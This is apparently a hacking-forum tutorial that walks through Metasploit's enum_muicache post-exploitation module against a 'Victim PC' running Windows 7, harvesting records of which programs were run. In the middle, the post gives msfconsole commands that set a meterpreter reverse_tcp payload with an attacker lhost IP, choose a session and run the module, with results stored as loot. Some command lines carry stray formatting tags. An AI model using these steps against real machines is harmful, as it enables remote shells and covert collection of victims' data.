• We just launched and are currently in beta. Join us as we build and grow the community.

How to Gather MUICache Entries in Remote Windows PC

SrMoca

System Load Balancer
S Rep
0
0
0
Rep
0
S Vouches
0
0
0
Vouches
0
Posts
64
Likes
157
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

This module gathers information about the files and file paths that logged on users have executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are parsed from the downloaded hive.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

1.png


Now type use post/windows/gather/enum_muicache

msf exploit ([color=rgb(128,]enum_muicache)>set payload windows/meterpreter/reverse_tcp[/color]

msf exploit ([color=rgb(128,]enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)[/color]

msf exploit ([color=rgb(128,]enum_muicache)>set session 2[/color]

msf exploit ([color=rgb(128,]enum_muicache)>exploit[/color]

2.png


3.png


4.png


Result will stored on your local computer

/root/.msf4/loot/

6.png
 

428,436

311,073

311,082

Top